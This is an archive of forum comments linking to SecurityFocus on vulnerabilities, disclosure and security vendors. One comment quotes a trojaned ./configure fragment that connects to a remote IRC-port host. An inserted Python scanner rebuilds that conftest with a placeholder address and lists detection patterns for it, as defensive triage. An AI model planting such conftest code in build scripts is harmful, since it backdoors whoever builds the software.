Domain: securityfocus.com
Stories and comments across the archive that link to securityfocus.com.
Comments · 2,651
-
Microsoft goes one to many... FIX for bug here...
Just as predicted, news media this week seems to be covering the MSIE gopher root exploit with a new focus on Microsoft and their real problems with security, not just the latest hole. One company even goes so far as to say that they 'cleaned up Microsoft's mess, once again'. With 18+ un-patched vulnerabilities in line for a fresh MS-fix, this may be the straw that breaks the camel's back.
-
Re:Not that special...
>What about ./configure scripts?
Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.
What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interesting "checks" in it:
...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) ...
It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.
You can find the full diff here.
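As an added, defender-side illustration (not code from the post, the monkey.org write-up or the diff it links to), the following Python script does the check the commenter says nobody does: it pulls every here-document that a ./configure script writes to a conftest source file and flags the ones that do more than an autoconf compile/link probe should. The sample configure fragment, the indicator list and the 192.0.2.10 address are constructed for the example; the regexes are a heuristic for the common `cat >conftest.c <<EOF` form, not a parser for every shell quoting style.

```python
import re
import sys

# Constructed sample of an autoconf-style ./configure: two ordinary
# conftest probes and one that behaves like the trojaned fragment quoted
# in the post (192.0.2.10 is a documentation-range placeholder address).
SAMPLE_CONFIGURE = r'''
cat >conftest.c <<_ACEOF
#include <stdio.h>
int main () { return 0; }
_ACEOF
cat >conftest.c <<_ACEOF
/* ordinary AC_CHECK_FUNCS probe: only references the symbol */
char connect ();
int main () { return connect (); }
_ACEOF
cat > conftest.c <<EOF
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main() {
  struct sockaddr_in sa; int s = socket(AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET; sa.sin_port = htons(6667);
  sa.sin_addr.s_addr = inet_addr("192.0.2.10");
  if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == 0) { /* ... */ }
  return 0;
}
EOF
'''

# A here-document redirected into a conftest source file:
#   cat >conftest.c <<_ACEOF ... _ACEOF   (also conftest.$ac_ext, <<'EOF', <<-EOF)
HEREDOC_RE = re.compile(
    r"cat\s*>\s*(conftest[\w.$]*)\s*<<-?\s*['\"]?(\w+)['\"]?\n(.*?)\n\2(?=\s|$)",
    re.DOTALL,
)

IPV4_LITERAL_RE = re.compile(r'"(?:\d{1,3}\.){3}\d{1,3}"')

# Each indicator is something a compile/link probe has no reason to contain.
# A genuine autoconf probe for connect() only references the symbol
# ("return connect ();"); it never fills in a sockaddr and calls it.
INDICATORS = {
    "ipv4_literal": lambda body: IPV4_LITERAL_RE.search(body) is not None,
    "connect_with_args": lambda body: (
        re.search(r"\bconnect\s*\(\s*\w", body) is not None and "sockaddr" in body
    ),
    "inet_addr": lambda body: "inet_addr(" in body or "inet_aton(" in body,
    "process_spawn": lambda body: (
        re.search(r"\b(system|execve|execl|execlp|execv|popen|fork)\s*\(", body) is not None
    ),
}


def extract_conftests(script_text):
    """Return [(target_filename, body)] for every here-document written to conftest*."""
    return [(m.group(1), m.group(3)) for m in HEREDOC_RE.finditer(script_text)]


def score_conftest(body):
    """Names of the indicators that fire on one conftest body (empty list = looks like a probe)."""
    return [name for name, check in INDICATORS.items() if check(body)]


def scan_configure(script_text):
    """Return one finding per suspicious conftest, with its position in the script."""
    findings = []
    for index, (fname, body) in enumerate(extract_conftests(script_text)):
        hits = score_conftest(body)
        if hits:
            findings.append({"index": index, "file": fname, "indicators": hits})
    return findings


if __name__ == "__main__":
    # Usage: python scan_configure.py [path/to/configure]; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIGURE
    results = scan_configure(text)
    for f in results:
        print(f"conftest #{f['index']} ({f['file']}): {', '.join(f['indicators'])}")
    sys.exit(1 if results else 0)
```

Run against the sample, only the third conftest is reported (IPv4 literal, a real `connect()` call on a sockaddr, and `inet_addr`); the two ordinary probes stay quiet. The point of the heuristic is the difference between a probe that references a symbol and code that actually uses it, which is exactly what a reader skimming a 10,000-line configure script would miss. The script is a triage aid, not a substitute for checking the tarball's signature or hash against the project's own announcement.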
-
Well, they may have a point somewhere in there...
"Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."
It is true that open source applications, being openly available on the internet and distributed in the same manner, are susceptible to backdooring and trojaning. Just look at IRSSI or FragRoute.
This risk factor is somewhat mitigated in commercial software, where the distribution is typically through CDs and other trusted media. Of course, someone can still somehow compromise a software developer's network, but it isn't exactly hanging out a sign saying "I'm the source code, hack me!" like the open source projects.
Just imagine, for a minute, how devastating it would be if Sourceforge was hacked and malicious code was inserted into a ton of the projects without anyone noticing for long enough that it could cause real damage? The danger is clear.
-
IE Better?
But in our Mozilla tests, the ads sometimes permanently blocked part of the page, and we had to reload the page until we got a different, regular, nonpositioning ad.
This must have been written before they mastered the obtuse concept of image filtering. Oh, wait, everyone wants to see more ads! Feature my eye. Give me IE, with its closed source and security hole of the day feature instead!
-
Sorry but
Not quite unbreakable.
Look here, or select QNX from the drop down.
Ouch -
oracle have done this before and failed
Wasn't it Oracle who said:
"Oracle9i. Unbreakable. Can't break it. Can't break in."
http://online.securityfocus.com/news/309
Then several days later someone broke it (see article).
This is a very poor publicity stunt where they know they cannot live up to their claims. They are just trying to make a stance against UnitedLinux.
-
I think you may mean this
MS added some extra switches to their c++ compiler which was supposed to weed out certain buffer overflows but there were apparently some problems with it. You can read about it here on securityfocus.
-
Re:Wow...
Had you read the article, you do not need to have a Gopher server running. It is a URL buffer overflow in the Gopher protocol.
No, the article doesn't say that. And from the bugtraq posting:
The attack can be launched via a web page or an HTML mail message which redirect the user to a malicious gopher server when the victim views them. The server can be very minimal, ie. a program that can listen on a TCP port and write a block of data; a fully operational gopher server isn't necessary in order to carry out the attack.
So it seems it is a buffer overflow in handling responses from gopher servers, not in the gopher URL. And they propose the workaround mentioned here of setting a proxy server for gopher that can never be accessed (localhost:someunusedtcpport).
-
BugTraq
Here is another article from SecurityFocus about the issue, along with the original post to the BugTraq mailing list about this problem.
-
It's called a buffer overflow
Old but never say never
A buffer overflow vulnerability exists in the popular mail client Pine 4.21 (and possibly earlier versions), relating to the function which regularly checks for incoming email.
The real concern here is that this requires no user interaction to exploit... a target need only be using a vulnerable version of pine. The overflow occurs when the user receives new email. While typically not yielding root privileges (unless root reads email with pine AS root) this can be used by a remote, anonymous attacker to gain local access to the target host.
-
Re:IPSEC
This guy doesn't need real security
That's the problem, attitudes like yours. I could care less about sniffing traffic, that's not the point, the point is to replace WEP with something better, and the goal isn't to stop people from grabbing credit card details, it's to prevent Joe Hacker from having an easy leap off point to launch attacks against others. In addition, you don't need firewalls on the machines to prevent traffic sniffing, ipsec tunnels set up on the boxes that pass IP traffic through the wireless link work just as well. here and here.
It sounds like if you had your way, he should just put up a couple of apple airports and forget about it. What myself and others are doing is trying to implement a reasonable amount of security when it should be implemented, at the beginning, and not as a duct tape fix after there is an incident and this guy has to explain why attacks were launched from his network. At any rate, the openbsd boxes with wireless cards are still the ideal solution, both from a cost perspective and a security perspective. There have been attacks against all the commercial wireless access points, ranging from expensive Ciscos to Breezecom to Linksys. The point isn't to have a totally locked down B1 and above security implementation, it's to make the kid with the laptop decide to move on to Joe User's unsecured Linksys and not this guy's network. I also assume that this guy is looking for a way to keep costs low, and this is the best way to do it. Somebody earlier mentioned Cisco Catalysts, yea right
SealBeater -
Re:The Bugtraq article
"Slashdot's filters SUCK like HELL."
Maybe you don't really want to post a huge comment that will require readers to click through anyway (it's too big to display at once).
How about posting a link to the ISS Alert instead? Is that so hard?
-
Re:two versions out
Actually, as mentioned in the article and by other posters, the Security Focus article quotes Johannes Ullrich of SANS as saying that the worm uses a "brute force" password cracker. This seems to be a misquote since I cannot find anywhere on incidents.org or any other site (besides SlashDot) that claims that the worm uses password cracking. This small detail makes a big difference since the patch only fixes some of the things that the worm does. The first thing the worm does is change the SA password to a random string. What will these poor DBAs do if their password gets cracked, and they can't get into their database?
-
Re:Thousand compromised?
It's not just stupid users. Maybe they buy a copy machine like the Xerox DocuTech. It's a powerful high-end copier. It's also not just a copy machine. It has an NT box and a Sparc running Solaris built into it. It also comes out of the manufacturer, wide open with security holes, trivial passwords and unpatched software. If you try to patch them and then ever have a service issue (don't tell me that things don't break), Xerox will gladly reinstall all of the loaded software. Bye bye, patches and passwords.
http://online.securityfocus.com/archive/1/273029
It's not just stupid users. Somebody chose this machine for the business and it's something that they NEED in order to function. Not only that, they may not have a (practical) way to keep it secure when you look at how the machine is really used. I'd suggest reading the entire thread, because there are more juicy details into the security problems and politics associated with big machines like these.
-
The myth of Windows insecurity
There is a myth floating around the internet that Windows is less secure than linux. Looking at these statistics from SecurityFocus.com reveals that in 2001 linux had more security vulnerabilities than Windows NT. Windows as a total package still has more incidents than linux, but Windows is deployed much more widely and gets a lot more scrutiny.
-
...hyperlink??
...I don't know what happened to the hyperlink there - here is the link in text form:
http://online.securityfocus.com/archive/1/254627/2002-05-17/2002-05-23/1
And another try at a hyperlink. -
Re:minus sendmail
That seems to be just 2001 ones. I'm sure there have been problems between 1988 and 2001; I just don't care enough to find them right now.
Okay, I'm bored today. here are some more. These two lists together may still not be exhaustive, but they are definitely long enough to prove my point that sendmail's security track record is very bad.
-
Re:minus sendmail
Why people think that sendmail is automatically insecure is beyond me.
Sendmail is fundamentally insecure. It is a single, monolithic process running as root - not necessary for most of its operations. A single buffer overflow would completely compromise the machine running sendmail. It was originally written with little regard to security and has a long lifespan, accumulating cruft. It should be no surprise that it has had several vulnerabilities over the years. (That seems to be just 2001 ones. I'm sure there have been problems between 1988 and 2001; I just don't care enough to find them right now.)
In contrast, Postfix is broken apart into several different processes. Each executes at the minimum privilege necessary to do its job. A process running as an unprivileged user inside a chroot() jail containing no setuid binaries is a minimum risk to the system. The entire system was constructed with a focus on security - both eliminating vulnerabilities like buffer overflows and minimizing their impact should they occur. It has, by comparison, an unblemished security record.
For more information on why Postfix's security is completely superior to sendmail's, please see this page.
-
Re:So where does this leave IE 5 point zero?
Thor Larholm (GreyMagic Software) confirms IE 5 is vulnerable.
For support you might use IEAK to upgrade your sites to 5.5 SP2. Internet Explorer Administration Kit is one thing Microsoft has done right. I used it to distribute 350+ IE installs when Zenworks wouldn't work. -
Maybe even smarter than that
This post to bugtraq claims Windows XP Pro is not vulnerable with the patch. If true this would support Microsoft's argument, "Well, if you upgrade..." -
Re:He's right... Here is a different solution.
One of the great things about this system is that it is extremely easy to rate software. Just count the exploits that are possible in the default settings and assign a letter. A college graduate could do it on his fingers.
:)
I'm afraid there is a major flaw in such a system. You can't simply count the number of vulnerabilities because they can have different levels of severity. For example, a DoS in psyBNC should not be given the same weight as a remote root vulnerability in WU-FTPD. It just isn't as simple as you make it out to be. -
Re:Territoriality
So what was this about? Certainly sounds like MPAA throwing its weight around by any means necessary.
-
More info on security focus
This article talks about how a 21 year old software engineer, networking specialist was able to uncap his modem via the ATTBI service
I, myself, used to work for a cable company who has run into situations like this (i'd rather not say who), and has not yet done anything to prevent this from happening in the future -
Security Focus - Microsoft Anti-Disclosure Plan
For some more technical coverage of Microsoft's views, take a look at
Microsoft Reveals Anti-Disclosure Plan
(emphasis in original)
Five computer security firms join Microsoft to set an official standard for limiting disclosure of software security holes
By Kevin Poulsen, Nov 9 2001 3:04AM
MOUNTAIN VIEW, Calif.--Microsoft and five major computer security companies rounded up the three-day Trusted Computing Forum on Thursday by formally announcing a coalition against full disclosure of computer vulnerability information, ending a week of intense speculation, and immediately sparking controversy.
...A chief objective of the group is to discourage 'full disclosure,' the common practice of revealing complete details about security holes, even if publication might aid attackers in exploiting them.
'If it becomes hard to release vulnerabilities, that's a good way for Microsoft to get rid of some embarrassment.'
-- Marc Maiffret, eEye Digital Security
Sig: What Happened To The Censorware Project (censorware.org)
-
Re:The Red Hat
I said: I haven't ever used their distro
the response: So how could you possibly have a valid opinion on the subject?
More of what I said that you conveniently left off: I have read a lot about them and have helped some people that use their distro, so I do know about the subject.
If I read from countless sources that Ford Explorers with Firestone tires are dangerous to drive, hear countless stories about how accidents have been caused by such a combination, and know a friend who was in a car wreck because his Firestone tires fell apart on his Ford Explorer, then I think I would know a bit about the subject. I suppose according to you I should start driving Ford Explorers with Firestone tires just to see if I can get in an accident.
what insecurities are you talking about? I mean -- find me a Linux distro that has no exploits.
Obviously you are clueless. Read the SecurityFocus Vulns Stats and note the table marked "Number of OS Vulnerabilities by Year". Now let's see you tell me that RedHat's distro is just as secure as other Linux distros. Compare the figures with MS NT/2000--they look close to me...
Qualify that. How do they do things the same way as Microsoft?
Geee...so many choices--where to begin. How about their "configurator" program. I only had to deal with it once--but it was a nasty experience. For one, every time it was run it would reset the real settings (edited by me in the /etc directory) to whatever its internal system said they should be--apparently from some other RedHat config file--they made it so that anyone who learned on a normal Linux system would have their settings clobbered as soon as RedHat's program started up.
How about the fact that they use a single script file for every service run at startup? This makes booting any RedHat system painfully-ass slow. That's just like when Microsoft uses single files per item for their "favorites" and cheap symbolic link substitutes.
What about the whole gcc 2.96 mess? Read about it here and here and here
Have you ever used Linux in a professional setting? Package management is essential.
Do you know anything? Slackware uses tar files for their packages--I've never seen any problem with Slackware's package management system.
It doesn't keep track of dependencies, however I usually have to do nodeps with rpms because the program only checks what it has installed--not anything compiled from source or installed through other packaging systems. However, tar could contain a package dependency file inside if it was necessary.
They don't have an apt-get, however that just checks dependencies and downloads files--it could be done using tar files if need be.
A really great packaging system would check the binaries to see what libraries they required and go from there. "This executable requires libuberssl.so.2--not present on system, but found in package ubernetlibs. Do you wish to download and install?" Unfortunately I haven't seen a packaging system like this, and I know the rpm program doesn't do this--it uses the files in /var/lib/rpm and complains if the dependencies aren't listed there.
Does this mean that you resent .debs too?
I would if nearly every Linux developer insisted on using .debs to distribute their binaries, therefore requiring me to install the packaging system on every Linux computer I use, just for the ability of installing binaries.
You can build and install tar'ed & gziped source just like with any other *nix.
Obviously you haven't tried to compile many programs from source. Not only does it take lots more time (try installing XFree86, Mozilla, or GIMP this way), there are also quite a few programs that take much time dicking around with them to even get them to compile. They'll be written for every OS under the sun and very temperamental. Or they'll have stupidly written makefiles. Or they'll have straight out errors in the makefiles/compile scripts/code that take an hour to correct. Etc. etc. etc... "./configure; make; make install" doesn't always work!
I can go on and on about how dumb your post is, and how unsubstantiated your opinion on RedHat seems to be, but it's pretty clear that you're a troll and trying to get a rise out of me.
The same can be said about you. I could go on and on about how idiotic your ideas about what a decent distro is and how to run it. Like how it is bad to just add patches to the kernel for some newfangled gee-whiz buzzword and put it in a major distro. Those patches should only be added by people who really need them--everyone else can wait until the patch goes through the review process and is confirmed stable.
-
Re:From looking at the release notes
7.3 is apparently still packaged with the vulnerable zlib 1.1.3 version.
-
Macromedia flash security flaw
And in other related news, Marc Maiffret of eeye reports over at bugtraq that the Macromedia Flash Activex control contains a Buffer overflow
-
Re:But its not just Best Buy
The vuln-dev thread started yesterday, that's the source for the MSNBC story.
http://online.securityfocus.com/archive/82/2002-04-29/2002-05-05/0 -
Re:Original source
If you want to be informed of these things when they are released, subscribe to a mailing list. Here is the original post. I submitted this yesterday, but of course it was rejected. Maybe I shouldn't have encouraged people to exploit the vulnerability? Nah!
Your recent submissions
2002-05-01 20:23:44 Best Buy (In)security (articles,news) (rejected)
-
As seen on vuln-dev...
This was originally a thread on SF's vuln-dev mailing list. The moderator, Blue Boar, posted the message on behalf of an anonymous correspondent.
The original message is available at SF's archive.
-
Re:Mailing-lists
This company then fixes the problem and offers to fix, for free, any windows that exhibit this problem. But you never registered your windows with the company, so they don't know how to contact you and tell you about the problem.
Maybe things wouldn't be quite so bad if we did receive updates from Microsoft, directly. I've installed Windows on lots of machines, registered them properly and everything. Never once has anybody from Microsoft phoned, or emailed to let us know about a security problem.
Like most other sysadmins the first notification I get about a problem with a particular program is when I read BugTrack, or NTBugTrack.
Just to keep this on-topic: I'm a sysadmin at a large company. We filter out attachments as they arrive, via some magic with exim. In the two years that I've been here we've never been hit by a single virus.
-
Re:This thing is nasty
Well there isn't much MS can do other than pull Outlook from production. As a Helpdesker, you would definitely tell anyone who was worried about a virus to update defs on spec. This is a good practice, unlike the use of the vectoring Outlook program. Of course, some M$ shill will claim that it's not M$'s fault and it is a user issue, but that would just be the monkeys aping their master Bill and his minions.
-
Check out these sites
I can suggest two sites you can check out for focussed information on this topic:
securityfocus.com
antionline.com -
You should also use Tools in-house
External audits are good because they bring in experts who focus on finding vulnerabilities in your network. These experts will come armed with a variety of vulnerability assessment tools to perform their audit. The only problem is that it will almost always happen less frequently than vulnerabilities are discovered, so this should only be 1 part of the overall solution.
You should adopt this practice internally, because if the tools are set up to check for vulnerabilities, you can be much more proactive about finding them than simply by scheduling consultants to come every few weeks, months, year. There are a variety of tools available, both freely and commercially.
A good tool will be updated frequently and check a lot of bugs, including the most critical (SANS Top 20, BugTraq, CERT).
Free Tools
SATAN -- Security Administrator Tool for Analyzing Networks
SAINT -- Security Administrator's Integrated Network Tool -- based on SATAN, GNU
SARA -- Security Auditor's Research Assistant -- similar to SATAN/SAINT check the Freshmeat page
NESSUS -- another free tool
Commercial Tools
ISS has a variety of tools available depending on your needs
NeXpose -- try the free demo, great ui, demo only lets you assess 1 IP at a time though :( Here is a review
A Networking Computing article on Vulnerability Assessment tools. Reviews many of the major vendors (so I won't list them all). Includes some of the free tools.
Here is another overview of security tools to get you started. -
Re:http://www.berbee.com
Agreed. I have found berbee to be extremely knowledgeable. Though I have not received an audit from them myself, I have worked with a number of companies that have, and the work has been excellent. One of the advantages to this organization is that they don't have the same potential for conflict of interest that someone like ISS or Cisco may have. Here are some opinions on various others:
Cisco - potential conflict of interest, particularly if you are a Cisco shop (which you probably are, at least partly). The Cisco SPA team has been noted for their skill in the past, probably due to the addition of the Wheel Group team via acquisition. The Wheel Group guys were top-notch (great Fortune article on them from a few years back, if you want more details on them), but I don't know that many of them are still with Cisco.
ISS - absolutely not. Again, conflict of interest. ISS's consulting services are not a core competency for them. It has been said that ISS has consulting services for the express purpose of moving more product. The mere possibility that this is true disqualifies, much like Cisco. Additionally, I have seen some terrible work from these guys - i.e. missing major weaknesses in policy like failure to enable lockouts on an NT domain.
@stake - honestly, I haven't seen their work in a while, so I don't know if they have improved. However, as of roughly 2 years ago, they were terribly unorganized and extremely expensive. I recall an associate shouting about an exorbitant hourly fee to have a "Junior Engineer" (@stake's term, not mine) take a look at around 50 servers. Additionally, I have seen problems with sales people being less than responsive, and an unwillingness on the part of the technical contact to discuss their methods. If you are a big community booster, you may also question their questionable stance on full open disclosure (more here).
Foundstone - The skill level you can expect from these guys is solid. I have been pleased with the expertise and professionalism of technical contacts from Foundstone, and the management team is certainly very capable in the technical arena. However, there is a catch. In general, I think it is wise to stay away from anyone that sells a "certification" of your security. Business security certifications that are not a direct one-to-one reflection of an accepted standard (ISO/IEC 17799 for instance) tend to be packages designed to sell more services. Who knows what you may have to buy to maintain compliance? I don't, since the web page has only sparse vague comments on their methodology.
Bottom line is this: you want someone that is professional, has quality references, is free from conflicted interests, and most of all, is open with you about their methodology. You want someone that makes you feel comfortable, and treats your potential relationship as an opportunity to educate you and equip your staff to deal with security from an intelligent business decision standpoint. Berbee is not perfect, but I have seen the best blend of these elements in them. -
these guys are good
I recommend www.securityfocus.com
-
Re:Mess them up.
According to Netcraft, www.fast.org.uk runs Microsoft Windows 2000, which is vulnerable to initial sequence number guessing.
-
Re:Selling spam to spammers
And herbalifesigns.com is running Apache 1.3.20, the newest version being 1.3.24. ChangeLog here. Hmm... SecurityFocus discusses a misconfiguration of Apache that allows remote users to determine if a given username exists on a system. Although the advisory mentions Red Hat Linux, the default configuration of Apache 1.3.20 is also affected.
-
Re:DrDoS
Steve Gibson is a kook and a crackpot. He's an alarmist, but unfortunately people not "in the know" tend to listen to him (most likely because he is an alarmist). He rails against raw sockets in XP, never bothering to notice that NT (which XP is based upon) has had raw sockets for a long time, and that it's possible to modify the Win9x TCP/IP stack to allow for raw socket-like abilities. Never mind that raw sockets are only available to administrative users in NT, as with any *nix (problem -- too many users run with administrative rights on NT, which is the equivalent of running as root all the time. This is the true problem, not raw sockets, and should be the one that's addressed). His "Distributed Reflection" DoS is nothing new. Hax0rs and kiddies have been doing it for a while. His GENESIS project is basically poorly-implemented SYN cookie protection. And so on and so on...
In short, the guy's a nut and only nuts pay attention to him. Try a real security site, like SecurityFocus.
-
Avoiding the Issue and Missing the Point
I went to your site about the "myth" of open source software being more secure, and I see where you point to the Security Focus table to try and prove your point. For the *thousandth* time, that table takes into account every single application that ships with a distribution. Can we lump in all the vulnerabilities for MS Office/Outlook, MS Works, SQL Server, and Exchange into the NT/2000 group?
My article does not compare Microsoft products and any Open Source technologies so I am confused as to where this rant stems from. I do remember linking to the Security Focus table as a way to point out that it is disputable to claim that Linux distros are more secure than Windows.
My actual article uses the Vulnerability Archive to compare UNIX flavors and Linux distributions to point out that the license the software is released under does not have as much of a bearing on whether the software is secure or not. So your rant (and +4 score) are rather unwarranted. -
Key to user security...
The key to user security is to enable it by default. Most people running Win2K at home don't bother modifying their file permissions, closing off unnecessary services, etc. They leave settings at the default and go on their way. If Microsoft made the default installations more secure it would drastically improve the security of its OS. How many times has Security Focus reported on vulnerabilities related to Windows file-sharing? The answer to the problem is to turn it off and let the user decide if they want to turn it on. Outlook scripting, ActiveX, file sharing, Windows messaging, etc. Removing or disabling these services are necessary to secure a Windows box, and to reducing the bad PR that Microsoft receives every time a new vulnerability is discovered.
-
Is it illegal?
I'm ignoring the fact that this 'technology' probably doesn't exist. The same people came up with 'shoshkeles' which never worked on my browser.
New York's Computer Crime statute says:
A person is guilty of computer tampering in the fourth degree when he uses or causes to be used a computer or computer service and having no right to do so he intentionally alters in any manner or destroys computer data or a computer program of another person. Computer tampering in the fourth degree is a class A misdemeanor.
It does require the computer owner to somehow notify the intruder that unauthorized access is prohibited. But one type of notification allowed is:
(b) prominently posting written notice adjacent to the computer being utilized by the user
So print out a big sign and tape it to the side of your monitor. Meanwhile, Wyoming has this to say:
6-3-502. Crimes against intellectual property; penalties.
(a) A person commits a crime against intellectual property if he knowingly and without authorization:
(i) Modifies data, programs or supporting documentation residing or existing internal or external to a computer, computer system or computer network;...
(b) A crime against intellectual property is: (i) A felony punishable by imprisonment for not more than three (3) years, a fine of not more than three thousand dollars ($3,000.00), or both, except as provided in paragraph (ii) of this subsection;
Sounds like this technique, if it really exists, violates both laws. -
Alternative: SecurityFocus Pager for example?
Yeah, nothing like having your systems go down over a weekend because you didn't upgrade fast enough. Pfft!
Why not try something a little more reasonable, such as SecurityFocus Pager 3.0? And I blockquote:
"The SecurityFocus Pager is a dynamic application designed to help system administrators track content of interest to them on the SecurityFocus.com web site. It affords the system administrator the ability to select categories of interest and tracks them automatically, notifying the administrator when new content arrives. The Security Focus Pager displays short descriptive summaries allowing the administrator to stay updated on relevant issues in the security world, including vulnerabilities, news articles, software releases, and other important information."
Of course, there are other tools available that do the same thing (or something similar). The point is tools like this allow admins to stay up on security issues, but let them upgrade immediately or as soon as practicable.
Or you can just do an apt-get update; apt-get upgrade; once in a while like I do.
;) -
Re:Oh yeah?
Not necessarily so. Check out a recent bugtraq posting that claims that keys up to and including 1024 bit are easily crackable by government types.
-
Oh yeah?
-
Hacked Servers Outsourced to Interland
According to the Security Focus article the affected parking servers had been outsourced to Interland. Not really surprising, since Interland has left their servers vulnerable to various vulnerabilities for months at times.